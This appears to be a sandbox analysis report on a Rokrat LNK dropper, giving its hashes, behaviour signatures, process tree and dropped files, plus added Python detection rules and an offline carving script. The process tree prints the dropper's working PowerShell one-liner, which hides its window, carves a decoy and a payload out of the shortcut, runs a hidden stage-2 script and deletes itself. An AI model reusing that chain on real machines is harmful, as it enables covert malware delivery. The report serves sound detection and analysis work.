Analysis
-
max time kernel
122s -
max time network
126s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
arch:x64 arch:x86 image:win7-20240221-en locale:en-us os:windows7-x64 system -
submitted
26-02-2024 04:58
Static task
static1
Behavioral task
behavioral1
Sample
mal.lnk
Resource
win7-20240221-en
General
-
Target
mal.lnk
-
Size
221.4MB
-
MD5
5f6682ad9da4590cba106e2f1a8cbe26
-
SHA1
7043c7c101532df47c832ce5270745dd3d1e8c08
-
SHA256
dbd5d662cc53d4b91cf7da9979cdffd1b4f702323bb9ec4114371bc6f4f0d4a6
-
SHA512
e744d1b0cf232c4cf224cd1413b13e41889692e2d1f29e948fe8d4a5cb1304bca9a7b5de9c34db98c8eb7440761d5233bc5ac6a4fe75de2d4009a06f318c1d35
-
SSDEEP
24576:P0sde6UvoEkUnigRXTTYdy830QtO0oIJjW7sFAc1Mh5l2yf:Mz6UvRXigjbaJa7f2yf
Malware Config
Signatures
-
Detect Rokrat payload 2 IoCs
Processes:
resource                                                                      yara_rule
behavioral1/memory/2496-165-0x000000000C060000-0x000000000C143000-memory.dmp  family_rokrat
behavioral1/memory/2496-166-0x000000000C060000-0x000000000C143000-memory.dmp  family_rokrat
-
Blocklisted process makes network request 5 IoCs
Processes:
powershell.exe
flow  pid   process
4     2496  powershell.exe
6     2496  powershell.exe
8     2496  powershell.exe
9     2496  powershell.exe
11    2496  powershell.exe
-
Checks BIOS information in registry 2 TTPs 1 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
powershell.exe
description        ioc                                                               process
Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion  powershell.exe
-
Deletes itself 1 IoCs
Processes:
powershell.exe
pid   process
2684  powershell.exe
-
Drops file in Windows directory 1 IoCs
Processes:
powershell.exe
description   ioc                     process
File created  C:\Windows\26033.dat    powershell.exe
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies registry class 9 IoCs
Processes:
rundll32.exe
description      ioc                                                                                                                                                      process
Key created      \REGISTRY\USER\S-1-5-21-1658372521-4246568289-2509113762-1000_Classes\Local Settings                                                                    rundll32.exe
Set value (str)  \REGISTRY\USER\S-1-5-21-1658372521-4246568289-2509113762-1000_CLASSES\hwp_auto_file\                                                                    rundll32.exe
Set value (str)  \REGISTRY\USER\S-1-5-21-1658372521-4246568289-2509113762-1000_CLASSES\.hwp\ = "hwp_auto_file"                                                           rundll32.exe
Set value (str)  \REGISTRY\USER\S-1-5-21-1658372521-4246568289-2509113762-1000_CLASSES\hwp_auto_file\shell\Read\command\ = "\"C:\\Program Files (x86)\\Adobe\\Reader 9.0\\Reader\\AcroRd32.exe\" \"%1\""  rundll32.exe
Key created      \REGISTRY\USER\S-1-5-21-1658372521-4246568289-2509113762-1000_CLASSES\hwp_auto_file                                                                     rundll32.exe
Key created      \REGISTRY\USER\S-1-5-21-1658372521-4246568289-2509113762-1000_CLASSES\.hwp                                                                              rundll32.exe
Key created      \REGISTRY\USER\S-1-5-21-1658372521-4246568289-2509113762-1000_CLASSES\hwp_auto_file\shell\Read                                                          rundll32.exe
Key created      \REGISTRY\USER\S-1-5-21-1658372521-4246568289-2509113762-1000_CLASSES\hwp_auto_file\shell                                                               rundll32.exe
Key created      \REGISTRY\USER\S-1-5-21-1658372521-4246568289-2509113762-1000_CLASSES\hwp_auto_file\shell\Read\command                                                  rundll32.exe
-
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
Processes:
cmd.exe
pid   process
2636  cmd.exe
-
Suspicious behavior: EnumeratesProcesses 3 IoCs
Processes:
powershell.exe, powershell.exe
pid   process
2684  powershell.exe
2496  powershell.exe
2496  powershell.exe
-
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
AcroRd32.exe
pid   process
2976  AcroRd32.exe
-
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
powershell.exe, powershell.exe
description              pid   process
Token: SeDebugPrivilege  2684  powershell.exe
Token: SeDebugPrivilege  2496  powershell.exe
-
Suspicious use of SetWindowsHookEx 2 IoCs
Processes:
AcroRd32.exe
pid   process
2976  AcroRd32.exe
2976  AcroRd32.exe
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
cmd.exe, cmd.exe, powershell.exe, csc.exe, rundll32.exe, cmd.exe, powershell.exe, csc.exe, csc.exe, csc.exe
pid   process         wrote to memory of  target process  entries
320   cmd.exe         2636                cmd.exe         4
2636  cmd.exe         2648                cmd.exe         4
2636  cmd.exe         2684                powershell.exe  4
2684  powershell.exe  2964                csc.exe         4
2964  csc.exe         2604                cvtres.exe      4
2684  powershell.exe  2480                rundll32.exe    7
2480  rundll32.exe    2976                AcroRd32.exe    4
2684  powershell.exe  1100                cmd.exe         4
1100  cmd.exe         2496                powershell.exe  4
2496  powershell.exe  2804                csc.exe         4
2804  csc.exe         2060                cvtres.exe      4
2496  powershell.exe  1204                csc.exe         4
1204  csc.exe         580                 cvtres.exe      4
2496  powershell.exe  1532                csc.exe         4
1532  csc.exe         2160                cvtres.exe      4
2496  powershell.exe  340                 csc.exe         1
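The lineage in the table above (cmd.exe -> cmd.exe -> powershell.exe -> csc.exe / rundll32.exe -> cmd.exe -> powershell.exe), together with the command lines recorded in the process tree below, is what a detection engineer turns into process-creation rules. The following is an added example and not part of the sandbox report: a small rule set in Python, run over constructed Sysmon-style events modelled on this sample. The PIDs and parent links are the report's; the command lines are abridged to the fragments the rules key on; the field names, the rule names and the benign control event (pid 4000) are assumptions. Each rule keys on one distinctive feature of this chain: cmd.exe locating PowerShell through a wildcard dir *rshell.exe inside for /f, PowerShell seeking into a .lnk and writing carved bytes with -Encoding Byte, the P/Invoke ShowWindow call that hides the console, rundll32 shell32.dll,OpenAs_RunDLL spawned by a scripting host, and a hidden PowerShell building a scriptblock from a file. A final correlation step walks the parent chain so the hidden stage-2 PowerShell is tied back to the cmd.exe that started the chain, which is the signal worth alerting on rather than any single rule.

```python
import re

# Constructed process-creation events (Sysmon Event ID 1 style) abridged from the
# command lines this report records. PIDs and parent links are the report's; the
# command lines are cut down to the fragments the rules key on; pid 4000 is a
# benign control that must not fire.
EVENTS = [
    {"pid": 320, "ppid": 0, "image": r"C:\Windows\system32\cmd.exe",
     "cmdline": r"cmd /c C:\Users\Admin\AppData\Local\Temp\mal.lnk"},
    {"pid": 2636, "ppid": 320, "image": r"C:\Windows\SysWOW64\cmd.exe",
     "cmdline": r'''"C:\Windows\SysWOW64\cmd.exe" /k for /f "tokens=*" %a in '''
                r'''('dir C:\Windows\SysWow64\WindowsPowerShell\v1.0\*rshell.exe /s /b /od') do call %a'''},
    {"pid": 2648, "ppid": 2636, "image": r"C:\Windows\SysWOW64\cmd.exe",
     "cmdline": r"C:\Windows\system32\cmd.exe /c dir C:\Windows\SysWow64\WindowsPowerShell\v1.0\*rshell.exe /s /b /od"},
    {"pid": 2684, "ppid": 2636, "image": r"C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r'''powershell.exe "Add-Type -TypeDefinition $t;[User32]::ShowWindow($cmdMainWindowHandle, 0);'''
                r'''$lnkPath = Get-ChildItem -Path $dirPath -Recurse *.lnk | where-object {$_.length -eq 0x0DD6DA21};'''
                r'''$lnkFile.Seek(0x0000162E, [System.IO.SeekOrigin]::Begin);sc $pdfPath $pdfFile -Encoding Byte;'''
                r'''remove-item -path $lnkPath -force;"'''},
    {"pid": 2480, "ppid": 2684, "image": r"C:\Windows\SysWOW64\rundll32.exe",
     "cmdline": r'''"C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\Admin\AppData\Local\Temp\mal.hwp'''},
    {"pid": 1100, "ppid": 2684, "image": r"C:\Windows\SysWOW64\cmd.exe",
     "cmdline": r'''cmd /c ""C:\Users\Admin\AppData\Local\Temp\working.bat""'''},
    {"pid": 2496, "ppid": 1100, "image": r"C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r'''powershell.exe -windowstyle hidden "$stringByte = Get-Content -path $stringPath -encoding byte;'''
                r'''$scriptBlock = [scriptblock]::Create($string);&$scriptBlock;"'''},
    {"pid": 4000, "ppid": 320, "image": r"C:\Windows\system32\cmd.exe",
     "cmdline": r"cmd /c dir C:\Users\Admin\Documents\*.txt /s /b"},
]

# (name, image regex, command-line fragments that must all appear (case-insensitive),
#  optional regex the parent image must match)
RULES = [
    ("cmd_wildcard_powershell_lookup", r"\\cmd\.exe$",
     ["for /f", "*rshell.exe"], None),
    ("powershell_carves_lnk", r"\\powershell\.exe$",
     [".lnk", ".Seek(", "-Encoding Byte"], None),
    ("powershell_hides_own_window", r"\\powershell\.exe$",
     ["Add-Type", "ShowWindow("], None),
    ("openas_rundll_from_script_host", r"\\rundll32\.exe$",
     ["OpenAs_RunDLL"], r"\\(powershell|cmd|wscript|cscript|mshta)\.exe$"),
    ("hidden_powershell_scriptblock_from_file", r"\\powershell\.exe$",
     ["-windowstyle hidden", "Get-Content", "[scriptblock]::Create("], None),
]


def match_rule(rule, ev, by_pid):
    name, image_re, fragments, parent_re = rule
    if not re.search(image_re, ev["image"], re.I):
        return False
    cmdline = ev["cmdline"].lower()
    if not all(f.lower() in cmdline for f in fragments):
        return False
    if parent_re is not None:
        parent = by_pid.get(ev["ppid"])
        if parent is None or not re.search(parent_re, parent["image"], re.I):
            return False
    return True


def ancestors(pid, by_pid):
    """Parent chain of pid, nearest first; stops at an unknown parent or a cycle."""
    chain, seen = [], set()
    ev = by_pid.get(pid)
    while ev is not None and ev["ppid"] in by_pid and ev["ppid"] not in seen:
        seen.add(ev["ppid"])
        chain.append(ev["ppid"])
        ev = by_pid[ev["ppid"]]
    return chain


def detect(events, rules=RULES):
    """Return ([(rule name, pid)], [pids of hidden stage-2 PowerShells whose
    ancestry includes a cmd.exe that located PowerShell by wildcard])."""
    by_pid = {e["pid"]: e for e in events}
    hits = [(r[0], e["pid"]) for e in events for r in rules if match_rule(r, e, by_pid)]
    stage1 = {pid for name, pid in hits if name == "cmd_wildcard_powershell_lookup"}
    chains = [pid for name, pid in hits
              if name == "hidden_powershell_scriptblock_from_file"
              and stage1 & set(ancestors(pid, by_pid))]
    return hits, chains


if __name__ == "__main__":
    hits, chains = detect(EVENTS)
    for name, pid in hits:
        print(f"{pid:5d}  {name}")
    print("full LNK -> bat -> hidden PowerShell chain at pid(s):", chains)
```

The inner cmd.exe (pid 2648) that only runs the dir listing does not fire on its own, and neither does the benign listing: the wildcard rule needs both the for /f wrapper and the *rshell.exe pattern, which keeps it from matching ordinary directory enumeration.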
Processes
-
[1] C:\Windows\system32\cmd.exe
    cmd /c C:\Users\Admin\AppData\Local\Temp\mal.lnk
    - Suspicious use of WriteProcessMemory
-
  [2] C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\SysWOW64\cmd.exe" /k for /f "tokens=*" %a in ('dir C:\Windows\SysWow64\WindowsPowerShell\v1.0\*rshell.exe /s /b /od') do call %a "$t1 = 'user32.dll';$t = 'using System; using System.Runtime.InteropServices; public class User32 {[DllImport(' + [System.Text.Encoding]::UTF8.GetString(34) + $t1 + [System.Text.Encoding]::UTF8.GetString(34) + ', SetLastError = true)]public static extern IntPtr FindWindow(string lpClassName, string lpWindowName);[DllImport(' + [System.Text.Encoding]::UTF8.GetString(34) + $t1 + [System.Text.Encoding]::UTF8.GetString(34) + ')] [return: MarshalAs(UnmanagedType.Bool)] public static extern bool ShowWindow(IntPtr hWnd, int nCmdShow); }'; Add-Type -TypeDefinition $t;$proName = 'powershell.exe'; $cmdMainWindowHandle = [User32]::FindWindow([NullString]::Value, $proName);[User32]::ShowWindow($cmdMainWindowHandle, 0);$dirPath = Get-Location; if($dirPath -Match 'System32' -or $dirPath -Match 'Program Files') {$dirPath = 'C:\Users\Admin\AppData\Local\Temp'}; $lnkPath = Get-ChildItem -Path $dirPath -Recurse *.lnk | where-object {$_.length -eq 0x0DD6DA21} | Select-Object -ExpandProperty FullName;$lnkFile=New-Object System.IO.FileStream($lnkPath, [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read);$lnkFile.Seek(0x0000162E, [System.IO.SeekOrigin]::Begin);$pdfFile=New-Object byte[] 0x00042C00;$lnkFile.Read($pdfFile, 0, 0x00042C00);$pdfPath = $lnkPath.replace('.lnk','.hwp');sc $pdfPath $pdfFile -Encoding Byte;& $pdfPath;$lnkFile.Seek(0x0004422E,[System.IO.SeekOrigin]::Begin);$exeFile=New-Object byte[] 0x000D9402;$lnkFile.Read($exeFile, 0, 0x000D9402);$exePath=$env:public+'\'+'public.dat';sc $exePath $exeFile -Encoding Byte;$lnkFile.Seek(0x0011D630,[System.IO.SeekOrigin]::Begin);$stringByte = New-Object byte[] 0x000005AA;$lnkFile.Read($stringByte, 0, 0x000005AA);$batStrPath = $env:temp+'\'+'temp.dat';$string = [System.Text.Encoding]::UTF8.GetString($stringByte);$string | Out-File -FilePath $batStrPath -Encoding ascii;$lnkFile.Seek(0x0011DBDA,[System.IO.SeekOrigin]::Begin);$batByte = New-Object byte[] 0x00000135;$lnkFile.Read($batByte, 0, 0x00000135);$executePath = $env:temp+'\'+'working.bat';Write-Host $executePath;Write-Host $batStrPath;$bastString = [System.Text.Encoding]::UTF8.GetString($batByte);$bastString | Out-File -FilePath $executePath -Encoding ascii;& $executePath;$lnkFile.Close();remove-item -path $lnkPath -force;"&& exit
      - Suspicious behavior: CmdExeWriteProcessMemorySpam
      - Suspicious use of WriteProcessMemory
-
    [3] C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c dir C:\Windows\SysWow64\WindowsPowerShell\v1.0\*rshell.exe /s /b /od
-
    [3] C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe "$t1 = 'user32.dll';$t = 'using System; using System.Runtime.InteropServices; public class User32 {[DllImport(' + [System.Text.Encoding]::UTF8.GetString(34) + $t1 + [System.Text.Encoding]::UTF8.GetString(34) + ', SetLastError = true)]public static extern IntPtr FindWindow(string lpClassName, string lpWindowName);[DllImport(' + [System.Text.Encoding]::UTF8.GetString(34) + $t1 + [System.Text.Encoding]::UTF8.GetString(34) + ')] [return: MarshalAs(UnmanagedType.Bool)] public static extern bool ShowWindow(IntPtr hWnd, int nCmdShow); }'; Add-Type -TypeDefinition $t;$proName = 'powershell.exe'; $cmdMainWindowHandle = [User32]::FindWindow([NullString]::Value, $proName);[User32]::ShowWindow($cmdMainWindowHandle, 0);$dirPath = Get-Location; if($dirPath -Match 'System32' -or $dirPath -Match 'Program Files') {$dirPath = 'C:\Users\Admin\AppData\Local\Temp'}; $lnkPath = Get-ChildItem -Path $dirPath -Recurse *.lnk | where-object {$_.length -eq 0x0DD6DA21} | Select-Object -ExpandProperty FullName;$lnkFile=New-Object System.IO.FileStream($lnkPath, [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read);$lnkFile.Seek(0x0000162E, [System.IO.SeekOrigin]::Begin);$pdfFile=New-Object byte[] 0x00042C00;$lnkFile.Read($pdfFile, 0, 0x00042C00);$pdfPath = $lnkPath.replace('.lnk','.hwp');sc $pdfPath $pdfFile -Encoding Byte;& $pdfPath;$lnkFile.Seek(0x0004422E,[System.IO.SeekOrigin]::Begin);$exeFile=New-Object byte[] 0x000D9402;$lnkFile.Read($exeFile, 0, 0x000D9402);$exePath=$env:public+'\'+'public.dat';sc $exePath $exeFile -Encoding Byte;$lnkFile.Seek(0x0011D630,[System.IO.SeekOrigin]::Begin);$stringByte = New-Object byte[] 0x000005AA;$lnkFile.Read($stringByte, 0, 0x000005AA);$batStrPath = $env:temp+'\'+'temp.dat';$string = [System.Text.Encoding]::UTF8.GetString($stringByte);$string | Out-File -FilePath $batStrPath -Encoding ascii;$lnkFile.Seek(0x0011DBDA,[System.IO.SeekOrigin]::Begin);$batByte = New-Object byte[] 0x00000135;$lnkFile.Read($batByte, 0, 0x00000135);$executePath = $env:temp+'\'+'working.bat';Write-Host $executePath;Write-Host $batStrPath;$bastString = [System.Text.Encoding]::UTF8.GetString($batByte);$bastString | Out-File -FilePath $executePath -Encoding ascii;& $executePath;$lnkFile.Close();remove-item -path $lnkPath -force;"
        - Deletes itself
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
        - Suspicious use of WriteProcessMemory
-
      [4] C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
          "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\py4ddipt.cmdline"
          - Suspicious use of WriteProcessMemory
-
        [5] C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
            C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES71A8.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC7178.tmp"
-
      [4] C:\Windows\SysWOW64\rundll32.exe
          "C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\Admin\AppData\Local\Temp\mal.hwp
          - Modifies registry class
          - Suspicious use of WriteProcessMemory
-
        [5] C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe
            "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\mal.hwp"
            - Suspicious behavior: GetForegroundWindowSpam
            - Suspicious use of SetWindowsHookEx
-
      [4] C:\Windows\SysWOW64\cmd.exe
          cmd /c ""C:\Users\Admin\AppData\Local\Temp\working.bat""
          - Suspicious use of WriteProcessMemory
-
        [5] C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe
            C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe -windowstyle hidden "$stringPath=$env:temp+'\'+'temp.dat';$stringByte = Get-Content -path $stringPath -encoding byte;$string = [System.Text.Encoding]::UTF8.GetString($stringByte);$scriptBlock = [scriptblock]::Create($string);&$scriptBlock;"
            - Blocklisted process makes network request
            - Checks BIOS information in registry
            - Drops file in Windows directory
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious use of AdjustPrivilegeToken
            - Suspicious use of WriteProcessMemory
-
          [6] C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
              "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\rukl6ztm.cmdline"
              - Suspicious use of WriteProcessMemory
-
            [7] C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
                C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA22A.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCA229.tmp"
-
          [6] C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
              "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ukph4mqo.cmdline"
              - Suspicious use of WriteProcessMemory
-
            [7] C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
                C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA268.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCA257.tmp"
-
          [6] C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
              "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\xknanuo7.cmdline"
              - Suspicious use of WriteProcessMemory
-
            [7] C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
                C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA2C6.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCA2C5.tmp"
-
          [6] C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
              "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\xkecb7mp.cmdline"
-
            [7] C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
                C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA3A0.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCA39F.tmp"
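The PowerShell one-liner at depth 3 does no decoding at all: it selects the .lnk by its exact length (0x0DD6DA21 = 232,184,353 bytes, the 221.4MB of the sample) and copies four byte ranges straight out of it. The ranges are contiguous (0x162E + 0x42C00 = 0x4422E, 0x4422E + 0xD9402 = 0x11D630, 0x11D630 + 0x5AA = 0x11DBDA), so everything after offset 0x11DD0F, about 220 MiB, is never read. The two script regions go through Out-File -Encoding ascii, which appends a CRLF; that is why working.bat is 311 bytes on disk although only 0x135 = 309 bytes are read. The decoy is launched with & $pdfPath, and because the sandbox has no handler for .hwp that call surfaced as the rundll32 shell32.dll,OpenAs_RunDLL child and the hwp_auto_file registry class pointing at AcroRd32.exe. The Python below is an added example, not code from the report or from the sample: it reproduces the carve offline against a copy of mal.lnk and checks each result against the MD5s listed under Downloads, so an analyst can confirm a new LNK with the same layout without detonating it. The path argument, the function names and the constructed test buffer are assumptions; the offsets, lengths, size check and hashes are the report's.

```python
import hashlib

# Offsets and lengths copied from the Seek()/Read() calls in the captured one-liner.
# "mode" records how the dropper wrote each region to disk: "raw" = Set-Content
# -Encoding Byte (bytes unchanged); "text" = UTF8.GetString followed by Out-File
# -Encoding ascii (non-ASCII becomes '?', and a CRLF is appended).
LAYOUT = (
    (0x0000162E, 0x00042C00, "mal.hwp", "raw"),       # decoy, launched with & $pdfPath
    (0x0004422E, 0x000D9402, "public.dat", "raw"),    # payload, written to %PUBLIC%
    (0x0011D630, 0x000005AA, "temp.dat", "text"),     # stage-2 PowerShell, later run via [scriptblock]::Create
    (0x0011DBDA, 0x00000135, "working.bat", "text"),  # launcher for stage 2
)
LNK_SIZE = 0x0DD6DA21  # the exact $_.length the script selects on: 232,184,353 bytes

# MD5s the sandbox recorded for the dropped files (Downloads section of this report).
EXPECTED_MD5 = {
    "mal.hwp": "d2a9da30bf1718349123ec813d055648",
    "public.dat": "31aeb43b981d4d6272193e321bb21333",
    "temp.dat": "78480139d86520ba82766c5b3c9a7479",
    "working.bat": "a1640eb8f424ebe13b94955f8d0f6843",
}


def layout_gaps(layout=LAYOUT, total=LNK_SIZE):
    """Return (bytes before the first region, gaps between regions, trailing bytes).

    For this sample every gap is zero: the four blobs sit back to back behind the
    LNK structures, and the trailing ~220 MiB is never read by the script."""
    gaps = [nxt[0] - (cur[0] + cur[1]) for cur, nxt in zip(layout, layout[1:])]
    last_off, last_len = layout[-1][0], layout[-1][1]
    return layout[0][0], gaps, total - (last_off + last_len)


def carve(lnk, layout=LAYOUT):
    """Carve each region and apply the dropper's write semantics; returns {name: bytes}."""
    out = {}
    for off, length, name, mode in layout:
        blob = lnk[off:off + length]
        if len(blob) != length:
            raise ValueError(f"{name}: input too short for region at {off:#x}")
        if mode == "text":
            text = blob.decode("utf-8", errors="replace")             # UTF8.GetString
            blob = text.encode("ascii", errors="replace") + b"\r\n"  # Out-File -Encoding ascii
        out[name] = blob
    return out


def verify(artifacts, expected=EXPECTED_MD5):
    """True for each carved artifact whose MD5 matches the sandbox's record."""
    return {name: hashlib.md5(data).hexdigest() == expected[name]
            for name, data in artifacts.items() if name in expected}


def carve_file(path):
    """Carve a copy of the LNK from disk and report which artifacts match the report."""
    with open(path, "rb") as fh:
        lnk = fh.read()
    if len(lnk) != LNK_SIZE:
        print(f"note: size {len(lnk)} != {LNK_SIZE:#x}; the dropper would not select this file")
    artifacts = carve(lnk)
    for name, ok in verify(artifacts).items():
        print(f"{name:12s} {len(artifacts[name]):8d} bytes  md5 matches report: {ok}")
    return artifacts


if __name__ == "__main__":
    import sys
    carve_file(sys.argv[1])  # assumed usage: python carve_lnk.py mal.lnk
```

Because the script keys on the exact file length, a re-packed LNK of any other size would never be picked up by its own Get-ChildItem filter; carve_file prints that mismatch rather than failing, since the offsets may still be valid for a variant.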
Network
MITRE ATT&CK Matrix ATT&CK v13
Downloads
-
C:\Users\Admin\AppData\Local\Temp\CabCEA7.tmp
Filesize 65KB
MD5 ac05d27423a85adc1622c714f2cb6184
SHA1 b0fe2b1abddb97837ea0195be70ab2ff14d43198
SHA256 c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d
SHA512 6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d
-
C:\Users\Admin\AppData\Local\Temp\RES71A8.tmp
Filesize 1KB
MD5 409816885c25d71f3965d42eedab5ffe
SHA1 7c59fd7bcdc9d37333e32bad21d37eaea28c3a3d
SHA256 a83f2640a02d41d838d0e2f0a709456db084782e4582fed1f1147055d22fc25f
SHA512 9e4c0072c2564a32020f7b4840fb129f31df82bab527e68e9695add85911155f9a612c5127c266b7ef2f4d23523f4ef8cd33a3de29f50de1fe965634ccbba29e
-
C:\Users\Admin\AppData\Local\Temp\RESA22A.tmp
Filesize 1KB
MD5 27c7bf5011abb63ea18688a6168afac2
SHA1 384d1409881f57cd76d6699e13da3cf4dd3afc8f
SHA256 71deb1fec7edba7df7c2ade5ccd3290c4d30fedf11a9b5625cd1fd9ba85a3c3e
SHA512 0d964dac83c15e9702930be21b1240ffb03a52b1a89679c8fff057483487787222c81e2ecbaff9b9491fb62ff3d0531c7b1176e2587f54649d4983f7f3ccb662
-
C:\Users\Admin\AppData\Local\Temp\RESA268.tmp
Filesize 1KB
MD5 6e59f905406a4d0f207efaa581516c46
SHA1 831733acd6f90df97f42ec831805efc1a2f57455
SHA256 106b0e1c5604ec3c9416dab648004f5e48287234dfa1278164f336dcb5688337
SHA512 be328db64aa1576024e73417c3267bb56c9d9e0f0f6cd85e69cc04ddd14125d3980512e61c8a6573b89f952620121d3677e5839310a313203ab2d4860ebcb632
-
C:\Users\Admin\AppData\Local\Temp\RESA2C6.tmp
Filesize 1KB
MD5 99dbd37d0a5613d131ab4ecf7e787efd
SHA1 8faed77f6059034bda2ccf3c09f3a88cea3af4fe
SHA256 500797ce85a708f7e19ee3478caa006524ee29f836522534c64b52167ca7a19d
SHA512 0e914adb4ae3420223ebf2dc0e49b35a8c02ad2875a76203a134edf32acaf31fc81b71e8df9065dfff5efa04926462a4e29417aa4c9d3ba6713351fc31042cae
-
C:\Users\Admin\AppData\Local\Temp\RESA3A0.tmp
Filesize 1KB
MD5 6bffc66eafb1538b5b8245bbad89efab
SHA1 8f31d6c1d5acc8613a42ed6383afa419a698633f
SHA256 11d800c6587e4119b32e9445956aa690fe1a6e22eb4115ef6e4c0d86764ace4f
SHA512 1f97c4226635ccf30d44ed34068841099d92e4ca2a11381465d117cda06c50dcdd9c8699084a83acc969645ae2ccf6860e3d2f5c6a65dceb5429aed27c32eddb
-
C:\Users\Admin\AppData\Local\Temp\TarCF26.tmp
Filesize 171KB
MD5 9c0c641c06238516f27941aa1166d427
SHA1 64cd549fb8cf014fcd9312aa7a5b023847b6c977
SHA256 4276af3669a141a59388bc56a87f6614d9a9bdddf560636c264219a7eb11256f
SHA512 936ed0c0b0a7ff8e606b1cc4175a1f9b3699748ccbba1c3aff96203033d2e9edabf090e5148370df42fbfc4e31d7229493706ff24f19ff42ff7bef74a6baad06
-
C:\Users\Admin\AppData\Local\Temp\mal.hwp
Filesize 267KB
MD5 d2a9da30bf1718349123ec813d055648
SHA1 5c5cd6f2461800adab4b1ab485fb49d9eebc4ab4
SHA256 653202d94d655f9fafbb1217fba57d23f30a7e3ed7fe3272f237ec21e0731126
SHA512 e3e9e526d6dc4544b460ca729383245e0298133fdcdf673fbad43f77dee2ed06ae592c1f55a6640bdf0791bf14a7424039b97f944f34e319525c0149bcf952cd
-
C:\Users\Admin\AppData\Local\Temp\py4ddipt.dll
Filesize 3KB
MD5 a4b7364583a6401a7dc0832a099a51bf
SHA1 3fa84d659351ef6549140b07a1f935203a18ced1
SHA256 be325a7510fd878b022f4e1b442eb20095424a648076a4dc265720cf3ec88532
SHA512 10b83e5957cb7ad0c2f1f5b6ddf91c51fa3df73feae2aa0cc72b5f8e1e225787eb0e035daa6582a90461261f4e73b4cec8586a6c0285770b0f8c8b94c7f46b5d
-
C:\Users\Admin\AppData\Local\Temp\py4ddipt.pdb
Filesize 7KB
MD5 1b2ef87687664ef36c5be37fc697340a
SHA1 96238ab8777d693907df9bf2f430491a49c240d6
SHA256 c38f5004a5b75e22555d4b155fcd4c7359bdd6b41ce829440ccae5771e4d9c3a
SHA512 565cfa12b4cf62735ee8eda054b590700f12dfba7d58f9539697d91354462b05b551038f402be63ad13e68a89c9b9bb5c030ddea90bfe1081bcdc5667e0d4bb3
-
C:\Users\Admin\AppData\Local\Temp\rukl6ztm.dll
Filesize 3KB
MD5 a66fa0827815f5b0419aca05b32f7b8b
SHA1 ab6fa56b7d5b6a79829e4766c3d79a5e22fcc168
SHA256 4b7dd8fe58dc437a20bc696bd3f8b39a92fbd0fa80df6947439ea801b912468c
